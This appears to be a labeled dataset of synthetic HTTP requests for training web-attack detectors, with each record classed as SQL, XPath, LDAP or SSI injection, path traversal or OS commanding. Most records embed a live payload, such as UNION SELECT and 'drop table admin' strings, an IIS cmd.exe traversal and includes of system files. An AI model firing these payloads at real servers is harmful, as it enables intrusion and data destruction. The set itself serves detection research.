Referer: /CeYdjvay/sdnfhi/cefscns/ocEwfyNe/mhemycmt.tiff
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 9.1; im-oi; rv:1.3.5) Gecko/67562885
UA-CPU: 68000
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7737x6163
Transfer-Encoding: compress
Upgrade: l1yi1/5.9, nlcbsf/2.6, tesil/7.1, asni/9.6
X-Forwarded-For: 42.38.123.60
X-Serial-Number: 763668311762942234

ifw6om8m5akobt9=uB.gXq6I&tcd5hd=2hndrops

End - Id: 43653
Start - Id: 41257
class: SqlInjection
GET /tsaeHgaint/tukQ/ZR..HP5E6.css? HTTP/1.0
Host: www.ttasdh1oPM.ch:80
Connection: a1dr7vYa
Accept: text/*;q=0.0, video/*, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ')    UNION ALL SELECT    97745   FROM    ed   WHERE   ( ''  =  '
Cookie: indesCaimea=oeuAgoaoo;W23xi-=9618149;fg=th 
Cookie2: $Version="4"
Date: Sat, 07 Apr 07 04:45:54 UTC
ETag: W/"YhcDo4nNnaUskY.J-."
If-Match: *
If-None-Match: *
Max-Forwards: 5
Proxy-Authorization: crea6 neeet=arnee
Referer: http://www.cBrNooTs.org/ib1t/Uardsg/ajlyslA/tsnr.nsf
User-Agent: Mozilla/5.7 (X11; U; Solaris 2.4; fh-on; rv:6.7.3) Gecko/67501260
Transfer-Encoding: compress
----: ------------------------------------------------

null

End - Id: 41257
Start - Id: 35747
class: XPathInjection
GET /acdfy/atzsNenturOtahrpooN/nPw4vbscript882dreplaceR15mr/cr7V/rppC4e@2/e1lMaK8bVs/j-OEQ-eo/sBix-biTostkTEMymc0B.pl?eta4ec=EtmE+&waVdbd=b50Et&al0ebe=024+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++823%3D HTTP/1.1
Host: 129.203.39.129
Connection: keep-alive
Accept: audio/*;q=0.3, audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, deflate, gzip
Accept-Language: r-csagm;q=0.2, cOeydn9t-en;q=0.6
Cache-Control: max-age=20636
Client-ip: 149.222.22.125
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="5"
Date: Tue, 28 Dec 04 07:21:35 UTC
ETag: "Y2G28OgdZeEhliz"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sun, 21 May 06 24:36:03 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 311
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: NTLM ZWFyOWRhbXVsb2V1ZDBsckhmOHJocm5JcnJpc2F0ZVI0YlRu
Range: 820401-
Referer: /bu6tn1et/ng1tsr/2ynrhyoo/n9ca.pdf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ttniczuBcrt3iwYtie6
UA-CPU: x86
UA-Disp: 233,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.1 219.78.110.72, 6.7 www.an9t.png
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35747
Start - Id: 49242
class: XPathInjection
GET /HXkYISQV/eaiqtuchrosinr06i6ds/nIC6dcevzGYeS-/N@SPEA/iEhhT8aRT/stR7Avxmn6t9sD.pl?sutiEeF=lo&dXpXKKGKTsow=iBLeeXkwKE74&oeO=acopy&NewiccsTtiuroga=aea2tswao&rt5tne7iniesmr=ynnboot.iniitipassthrue+hbc&mztaec=e6h&stdinwp-tTj3D=81029&dlntow=419+++++or++1%3C++osii%2Fkouank%2FenNas%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D031%5D++or+++++8470%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: www.tis6l.net
Connection: moNDep
Accept: application/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 200.206.243.113
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Sat, 10 Jun 06 12:08:19 UTC
ETag: "tnnfuaGAJp@dyfsdeg"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Sat, 07 Jan 06 05:13:57 GMT
If-Unmodified-Since: Mon, 30 Mar 09 20:58:04 GMT
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Fri, 18 Nov 05 21:03:53 GMT
Max-Forwards: 25
MIME-Version: 9.4
Pragma: qinrr='Herrgn'
Proxy-Authorization: Digest realm
Authorization: NTLM Y2lpbmNhb2RyazRsbnM4d2FUbm5uZXVlejVpdDJpcnJ2RW1h
Range: -364650
Referer: http://1hru.it/pnnepit/hteT.conf
TE: trailers
Trailer: TE
User-Agent: xeutNpwoi/1.3.1.7
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 4.5 8.224.35.56, 0.5 www.f4Aa.css
Transfer-Encoding: compress
Upgrade: ja8xa/5.6
Warning: 066 www.lqoEr.jpg "ls5eia" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49242
Start - Id: 35454
class: SqlInjection
PUT /sock_streamV5QF5UwOg7W8/91Iegi/mruvragTtH0a/bbp-JR7a.htm? HTTP/1.0
Content-Length: 83
Content-Language: rs,Esuo,a
Content-Encoding: compress
Content-Location: http://www.anst.fr/ttrhag/Hovawra/hsiorrw/wcoobi/eeroneo.fgf
Content-MD5: bnRpb2FVZWVyZWh0STNhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Mar 07 07:34:56 CET
Last-Modified: Fri, 23 Oct 09 11:50:27 GMT
Host: 226.252.134.30:77584
Connection: close
Accept: text/*, image/jpeg;q=0.0, audio/x-wav;q=0.4
Accept-Charset: windows-1254;q=0.8, euc-tw;q=0.1, iso-8859-4;q=0.7, cp-932
Accept-Encoding: 
Accept-Language: s-ieis, ewoF-ohtpedte;q=0.6, vtraeo7-k6, ohmo-e;q=0.1, nrbls-o3tn5fes
Cache-Control: no-cache
Client-ip: 17.114.30.62
Cookie: eaatgs71bTeb=';  drop   table     admin;rete=7frE ltynu;rahbeNwpd5z=obnxtermaihttpsqvemoly
Cookie2: $Version="77"
Date: Tue, 08 Jan 08 12:46:47 GMT
ETag: W/"kAFCpgl.doSj.xaZIyq"
Expect: 100-continue
From: CiEact@jfre.it
If-Modified-Since: Fri, 30 Oct 09 13:05:29 GMT
If-Unmodified-Since: Sun, 01 Feb 09 20:42:23 GMT
If-Match: "7ecbKU_JA5kK9LCoX"
If-None-Match: "60z8OIyrKbkPjxZ"
If-Range: Sun, 25 Apr 10 19:24:18 CET
Max-Forwards: 4371
Pragma: no-cache
Proxy-Authorization: SsfrtN l9Nhbgne=Oxiwaqii
Authorization: Basic NW8waDplZWxnYWFl
Range: 20841-,-28276
Referer: http://www.gieOlaz.de/otuersr/dead12/oi3a.pl
TE: chunked
Trailer: Referer
User-Agent: Mozilla/8.7 (compatible; Konqueror/5.8; SunOS sun4u; e4Mno; qoritvieoA)
UA-Disp: 259,478,16
UA-OS: Windows 98
Via: azsb/5.6 www.hrSssrph.tiff
Transfer-Encoding: qpgrs; tezw=h5le
Warning: 433 142.224.31.47:66 "3t6fta" 
X-Forwarded-For: 142.47.121.158
X-Serial-Number: 8721257248
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

aprEeesMecushd=et&gbcvchildxOE4I=tes<dnteezadt&ne=6607573&egse8neaqeEpsu=washsta 

End - Id: 35454
Start - Id: 46144
class: PathTransversal
GET /otxhulyghnerepseqi/o0Hu0nXal99ud_Vo-sF/x1u7VQFolkWO-xyjneuZ/lowkhg5vzeeb3/eshp1mcnaCdz.dll?yheie7=e3K3MA&@aKB-r=kTregs5s96sg&etyElB1Hlnyt=638462&dkehotnt1otmlOX=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Flij.conf&jstmLesHmrsitg=rpmc5tnc&LaYxSUH=8736626 HTTP/1.0
Host: 16.203.132.190:80
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, cp-932;q=0.3, windows-1250
Accept-Encoding: *
Accept-Language: tail1-i, aaehe-c7msa, alalAsnu-ltnh;q=0.2, pmsLcd-o
Cache-Control: no-cache
Client-ip: 219.211.206.215
Cookie: oi8h9dt=46112713;.includeVyO8@JjOY=aNnwget;ulAsloH=05;access_loglIJ=3rUh
Cookie2: $Version="9"
Date: Sat, 26 Dec 09 01:59:47 UTC
ETag: W/"Awz51aejRXkRDAiXh6"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Tue, 06 Sep 05 02:29:55 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 05
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: 9bHR aNt8n=lOa8lr0
Authorization: aror iyeebrdb=SAau
Range: -526467,43-,829-431383
Referer: http://etlw5.cz/iude/2oYes1ei.aspx
TE: chunked,deflate,chunked
Trailer: Upgrade
User-Agent: hk4-gA55T http://www.ipdtaf.net
UA-CPU: x86
UA-OS: Linux
Via: 1.5 238.183.46.241, 6.7 177.24.47.121, FTP/8.7 166.214.149.80
Transfer-Encoding: gzip
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 167 60.70.73.146 "Bech10nim" "Wed, 08 Feb 06 20:07:02 UTC"
X-Serial-Number: 678023085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46144
Start - Id: 40830
class: SSI
GET /gXwxz.mspx?eenHjondc=140288814&gceffbed=%3C%21--++%23odbc+++statement++++%3D++++%22select+++++oraie7%2C+nlo5%2C+++eoeegr+++from+++TgoanC7n+order+by+++++3%2C+++++68%2C+++6%22+++++--%3E&eiscaB=3772426 HTTP/1.0
Host: 124.239.223.157
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.8, iso-8859-2;q=0.0, iso-8859-6, iso-8859-8-i;q=0.0, iso-8859-8
Accept-Encoding: gzip;q=0.9, gzip;q=0.4, compress, compress, compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 243.167.247.234
Cookie: ad=w.S;sd=j;s8mntvPnncaeEl=563338
Cookie2: $Version="4"
Date: Mon, 28 Feb 05 19:50:48 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: oulsi
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "AfEwkyuXy7BzyYFNKmX6"
If-None-Match: "rZc1_isaOo7r18Hs."
If-Range: Mon, 18 Feb 08 04:09:16 CET
Max-Forwards: 4632
MIME-Version: 0.3
Pragma: tgae=uj
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: http://t9tTi4ea.it/beln5POp/a9sed9nl/ajf2hur/4hmuofi.sh
TE: gzip;q=0.0,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: sib4rneirs (eT5ZPV5D; l-.IZdV.; n5KgF.wJl)
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: HTTP/9.6 www.etTTtee.gif, HTTP/8.1 www.ieuE.png
Transfer-Encoding: gzip
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 627 147.97.235.80:0740 "auhimyejsitdsrd" "Fri, 07 Jul 06 12:59:41 UTC"
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40830
Start - Id: 44214
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Eamdmlms.st
Connection: close
Accept: image/png;q=0.7, image/jpeg
Accept-Charset: windows-1253
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Sun, 18 May 08 02:45:56 CET
ETag: "fCVpdS-De4XAIYRavLw"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Wed, 10 May 06 16:35:04 UTC
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: "02BWo86KrYbzqCLhlLoc"
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 8940
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest qop=i8kedAln
Range: 09660-850419
Referer: http://www.gOsqt8an.st/SsN7hen4/i0aQ8ijl/onsfHsl/6ieapd/cO6i.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.4 (compatible; MSIE 9.0; Mac OS X; eD1xomyT7; biqjs; dsnctir)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 352x848
Via: 6.7 www.9wmetEm.htm:7872, 9.2 205.83.79.42
Transfer-Encoding: identity
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 834 www.ecbnesr.png "oqoba9" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44214
Start - Id: 41314
class: SqlInjection
GET /oeYiSboCRuOHxTWs5Uc/n6LfrWF/eQQ3xG0RB-eZ/mWFTgK15YqU/twoehons/3@YREJZ0YWdq/IFMpz/8and@IL/A5tjfu6spo3N/eK9aFKM/GrsfH43alln3MhN/WeYx1uboot.ini1a2input.tiff?7e9e0ofe=Ceeieaa+aNd&ot8ri=58202902&E7d3ySao=obukl&L2SlsSbvIA=9348157427&oDlsal=iilrol4A&6qt=470&edni=566084 HTTP/1.1
Host: 140.2.53.151
Connection: close
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 196.92.230.32
Cookie: cpflire9wfi4si=efSau%o4aa w4rconnect U rt;Rcat1h=1816567;tasaeuneoo=OR  'erttrr2'   =   'Sim'+'ple';ed1olas=%styleTa;esoeley5tfjDsbe=emsia7o;crseomeo4=02665238
Cookie2: $Version="98"
Date: Mon, 11 Sep 06 14:12:51 CET
ETag: "jhVi5_ntp.M3f9Ng0"
Expect: 100-continue
From: ueaeFah@isedattkdk.be
If-Modified-Since: Fri, 31 Aug 07 09:19:11 UTC
If-Unmodified-Since: Tue, 24 May 05 23:01:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Jul 06 20:09:08 CET
Max-Forwards: 0057
MIME-Version: 6.4
Pragma: hl='keei3c'
Proxy-Authorization: Basic OXJScG46cmZlc2Rz
Authorization: NTLM dzFjdnNpeXNtZHppbjZkN2Fvb2hueHNlcHNzaWFidmhlaUk5bm1vZ2R2Zg==
Range: -49888,81299-31,-700
Referer: http://www.aaeiici.de/sgrIavD.dll
TE: deflate;q=0.1,trailers,trailers
Trailer: Referer
User-Agent: rKErbg http://www.e0lns.org
UA-CPU: 68000
UA-Disp: 951,8688,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 187x5335
Via: FTP/3.7 www.hgtp.tiff
Transfer-Encoding: deflate
Upgrade: me0a1/8.7, htic/4.4
Warning: 506 www.ahaarsa.jpg "smnu" 
X-Forwarded-For: 139.28.183.159
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41314
Start - Id: 41559
class: SqlInjection
GET /eqcK/g7nooauu8oAotadjh/eieoxeF/trC-/lZxZ4c1ZzVDxC/nW5Q@qpa3B.yUk7n/5md/oiqtxtlvIJleotf.mdb?Gihitnoeqimsl=Estu0tnxateew&ei=ekxkvit%27+UNION+ALL++++SELECT++ztit++++FROM++++moeO++++WHERE+++%27%27+++%3D+%27&vsttase=iaifclbon1gs5ufog&dmsn=eteswgetbeqaeval&execCGxRMXIvmY=Odenmg07te HTTP/1.1
Host: www.pimDod.fr
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.9, cp-932;q=0.1, iso-8859-9;q=0.9
Accept-Encoding: deflate;q=0.1
Accept-Language: n-powo7es;q=0.7, oAucnk-tetsr, eo-e, ehe-tliww;q=0.9, wnene-EeL
Cache-Control: max-stale
Client-ip: 83.99.184.79
Cookie: oataja=11;crnl8f1r6=alogs1txvar&nn ui;rhal=o=ot:;rpp=actthiueamyerc;lhtaccesoM9brcp6WfjL=saxGUGKZXlQ;oIeeuaormhOMk=%u(tsleve9hlee
Cookie2: $Version="9"
Date: Sun, 14 Jan 07 21:40:32 GMT
Expect: 100-continue
From: usaacy07@scsi6.be
If-Modified-Since: Thu, 28 May 09 04:14:29 CET
If-Unmodified-Since: Tue, 05 Jan 10 16:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 18:27:15 GMT
Max-Forwards: 6230
MIME-Version: 4.7
Pragma: n=lew7a
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Digest nc=6A87AD8E
Range: 4-728143
Referer: /eaiw0eRo/niAio.mp3
TE: trailers,trailers,chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 8.6; sc-ia; rv:9.1.1) Gecko/41211819
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1852x515
Via: HTTP/1.3 www.ehFYs7ne.shtml, 0.4 18.45.192.180, FTP/4.9 39.166.25.99
Transfer-Encoding: identity
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 868 212.59.150.87 "tTe6e" "Fri, 15 May 09 11:43:43 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41559
Start - Id: 42675
class: SqlInjection
GET /lgWR9HJ9/o3sbzea0EdgbtidxeseS/triezutawe/z4.html?naouttdmer=3AmEzln6Eht&osamYE=0rdi6p1veipdiaastY&Et43qOnor5ea=%27+++++OR+++++%27erp4nderoiNne%27%3D++++%27++++&8oswz=r2yceseagm&EoedhsNso=n6ap2dlu%3B%5BwAea&positionwMCbrqtEHUG=9130&YselectCefj=yA&rsa8rle8l=taiHrnorenopthlAi&eeej=leetnYBhoiagastaf HTTP/1.0
Host: 214.13.35.49
Connection: xn1gs6n
Accept: video/*, text/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: he='eEipnsln'
Client-ip: 29.149.61.93
Cookie: YpildrbToz=sks;unh=uti;ieTflia6N=hEMnZmRu;ll=mbf1XDzJc;9trnaehefkros=03
Cookie2: $Version="0"
Date: Fri, 23 Oct 09 09:47:17 CET
ETag: "ZrRp2eug-ZzMMIJybKLT"
Expect: itee
From: cil0mei@xdsw.org
If-Modified-Since: Wed, 29 Sep 04 08:07:47 UTC
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "fuB2h0wHx7gC9AjbvBG"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 7
MIME-Version: 2.0
Pragma: eaayt='ig7minY'
Proxy-Authorization: NTLM cmNva2FvcHNvaXdsbmVlYWVpaGV5dG1tcm1yb2g2bnRlMXJzc2pyZTk3
Authorization: Digest algorithm=MD5-sess
Range: 73002-0
Referer: /cans.aspx
TE: chunked;q=0.0,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 9.0; ag-yT; rv:4.1.2) Gecko/97928844
UA-CPU: PowerPC
UA-Disp: 414,7114,8
UA-OS: Windows 98
UA-Color: color32
Via: FTP/7.9 www.amrr.gif:21388
Transfer-Encoding: gzip
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 189 97.161.249.166 "Orce4" "Fri, 08 Sep 06 07:10:49 GMT"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 732852130807
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42675
Start - Id: 40393
class: SSI
GET /@3mVgBEDNK/rmnla7gaAlsOoHo.css?oidyhp1=tGFs%400XS&mNfgB=revAe&caetinnw=897nTnolvttd86&FhomevlikeIP=19&or=nca1d HTTP/1.0
Host: 88.156.162.242
Connection: eifry
Accept: image/gif;q=0.1, image/gif;q=0.7
Accept-Charset: *
Accept-Language: a-olmld, oaixzajy-u, e5naaeci-etie, al-etqrot;q=0.2
Cache-Control: min-fresh=2209
Client-ip: 187.179.129.62
Cookie: RBCHlfD2L=<!--   #include  virtual="c:\winnt\system.ini"     -->
Cookie2: $Version="034"
Date: Fri, 14 Aug 09 17:08:42 UTC
From: i6tefr4t@tyaalr4l.biz
If-Modified-Since: Fri, 12 May 06 15:08:06 GMT
If-Unmodified-Since: Sat, 08 Jul 06 11:20:33 UTC
If-None-Match: "y0o4ijx@ccIOPmy"
If-Range: Fri, 24 Jun 05 05:25:47 UTC
MIME-Version: 9.7
Pragma: geaeot6a='iiu9ad'
Authorization: Digest algorithm=MD5
Referer: http://www.tEdtz5.net/mhvpaza/tItr8/duOn.gz
Trailer: If-Match
User-Agent: 38XcjMa http://www.Rifh.it
Via: FTP/0.0 246.233.70.213, 0.9 117.172.138.53:65, Tphes/3.1 35.146.68.203
Transfer-Encoding: 8eche
Upgrade: trpi7/5.0, elon/6.9, eeEg/3.7, ktDFz/0.7

null

End - Id: 40393
Start - Id: 37721
class: LdapInjection
POST /wiWn5XgPWTqGmsESm_rh/@5Bjk7mxvarf/uelt/yro6fdgi5tadtEaIik/Ms4qHd_l1/jlY73p@Y5Sq/2MwCqQBJXMdO_53/uNsteli/ePRxk9I.pl? HTTP/1.0
Content-Length: 226
Content-Language: o
Content-Encoding: compress
Content-Location: http://www.oeus6aha.de/etdcS/mTsespse/tshe0.jsp
Content-MD5: c3h1akN1SEF0ZXluVHVxeA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 May 09 10:10:37 GMT
Last-Modified: Sat, 11 Nov 06 05:59:30 CET
Host: 43.249.51.249
Connection: icNatces
Accept: video/*, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: 9iscna-b0eo, ciSalnc-e;q=0.9, ehsae8M-t8e, beloEn-f7wol2sT;q=0.0
Cache-Control: max-age=45
Client-ip: 221.29.121.34
Cookie: oiaSr=mukrseeiltat;ojOeuHxdSCeo=En?J;QEKbpBsGB=p);4bZ2=8;lGBlogMa@=sdl
Cookie2: $Version="457"
Date: Sat, 28 Oct 06 12:16:41 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: le0heT
From: ehsEPtLe@nenolcsxew.it
If-Modified-Since: Sun, 13 Aug 06 12:44:51 GMT
If-Unmodified-Since: Sun, 03 Feb 08 04:57:47 GMT
If-Match: "RDpFUzduJq3HjHpF"
If-None-Match: "8rZkO.1eC_9V-9J_q@"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Hwhen ljaca=irec
Referer: http://823CsK.it/neteryr.pdf
TE: trailers
Trailer: Referer
User-Agent: n1ecdOtion/1.8.8.1.2
UA-CPU: MIPS
UA-Disp: 919,571,16
UA-Color: color16
UA-Pixels: 8766x859
Via: FTP/8.5 www.6ih9w.shtml:29
Transfer-Encoding: ethsaa; s7qps=ieseo
Upgrade: oOfa/5.4, fNwtol/6.6
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 846902452623
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iS5tsrh5R=7binlocationba&l6itfh=b@m;l&psr=1rced&JfQC=91122&mz7uahrse79au=n r5cmd&mcbazrutiuOku1k=m awhfeg&tyrlo9vselBhmn=yNhmrmhh4&VYKN241D=9506&s47rsdfm=zdrptr1ndocuee&ezanoaafvaiG=Hqoa)(&(objectClass  =1en3*)

End - Id: 37721
Start - Id: 50033
class: XPathInjection
POST /hr7t1oRkhiMdtpe/8uolw2ea/gpynAaTieSvtued/u3.xsowE_w5pr/o5Ldes4iXn9ueod/cddlzu6REgesUou/gd-Z2ublUM/miQOMviWr.css? HTTP/1.1
Content-Length: 29
Content-Language: srociirm
Content-Encoding: identity
Content-Location: /yitlb/smvar/fdpcaei/r4esbVdo.shtml
Content-MD5: bGVxdGNhZXRudGdkcHRmcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Oct 05 07:55:27 GMT
Last-Modified: Sun, 09 Nov 08 23:13:56 UTC
Host: www.sIaoasHte.de
Connection: hwtsmp
Accept: audio/basic, video/quicktime;q=0.2
Accept-Charset: utf-8
Accept-Encoding: *;q=0.5
Accept-Language: eethsed'     or     1< necbr/e/2etzh/child::text()[position()=1] or  'adhce6uc'    =  '
Cache-Control: max-stale=80466
Client-ip: 80.186.16.60
Cookie: hgauhu9atetr=rSHaY5;illOhnttbood4L=zts;rjlinn4dstlNseh=zm;e2=s5LfvY--F04;twiezsk=iroenTnTitosi;y0aY5=60403840
Cookie2: $Version="17"
Date: Thu, 08 Mar 07 23:33:44 CET
Expect: 100-continue
From: vhmmsH@tdoi.it
If-Modified-Since: Sat, 26 Jul 08 14:15:20 GMT
If-Unmodified-Since: Wed, 27 Dec 06 11:21:59 UTC
If-Match: "7L6-.c9FKMWCxaffOeP"
If-None-Match: *
If-Range: "mA@xggY9HjojAEmC_Oy"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Authorization: NTLM cXplaGZtZGRvcHByOHRScXNuc2lhZ2VhMHQ4Q3pzaDVuN0VhcnJ5bWlu
Range: 765-
Referer: /2aado/faeeeEej/ayO6ioes/g7otw.gif
TE: trailers
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 0.4; rh-nQ; rv:5.4.7) Gecko/26402199
UA-Pixels: 793x7153
Via: 3.5 116.246.96.157
Upgrade: et9sce/9.2, quccwr/8.8, 3xceD6/4.5
Warning: 601 www.Dn0amett.shtml "dantsuss5ePa" 
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

rrThrtneyA=attidPhtDjRcbtreh8

End - Id: 50033
Start - Id: 44526
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 16.29.77.250:80
Connection: keep-alive
Accept: image/jpeg;q=0.7, application/*;q=0.9, image/jpeg
Accept-Charset: utf-8;q=0.2, x-mac-roman;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: oETh-1
Cache-Control: min-fresh=06
Cookie: occhecsmCeeEe=ct@qN@7W@56P;VHAS-usr=hqao3hbtDtLuts;ppseedi=o6i;dcddgriiiestce=cGIt88rI5;QxWBb.=m 
Date: Sat, 02 May 09 19:01:08 GMT
ETag: W/"pik_981fbQAX0z-QQeD"
If-Range: Wed, 03 Nov 04 07:02:32 GMT
Max-Forwards: 2
Pragma: 4ner='2t'
Referer: /hioEmhti/e7j5aea/yejt/tIe0eHa/Y4eGtnom.jpeg
TE: trailers,trailers
User-Agent: dikgt3te8 (hDaqQ.d)
UA-Disp: 684,6409,16
Via: 5.7 www.aqldp2tu.tiff:56674, 2.8 203.217.240.173

null

End - Id: 44526
Start - Id: 36874
class: LdapInjection
GET /op/dpez/iTtr5yoetttebltseee/9TAamaNeNidntcf.shtml? HTTP/1.0
Host: 3.229.220.182:09592
Connection: aEsaa
Accept: image/gif;q=0.4
Accept-Charset: iso-8859-4, x-mac-ce;q=0.5, iso-8859-2
Accept-Encoding: 
Accept-Language: a-ae
Cache-Control: only-if-cached
Cookie: nwise5l1metlT3O=) (| (   cn=*o'brien*)(mail   =*o 'brien*  ) 
Date: Thu, 07 Jun 07 21:17:06 CET
ETag: W/"p_Vvkozo6f9NxCBX"
Expect: ehadshmp=l0yr9rJe;1tulta=a5STe
If-Modified-Since: Thu, 22 Feb 07 10:49:45 GMT
If-Unmodified-Since: Sat, 27 Sep 08 18:52:00 GMT
If-Match: "tFASbYE9J2AU8haTV"
If-None-Match: *
If-Range: *
Max-Forwards: 149
MIME-Version: 9.7
Pragma: mIf=ihkee2
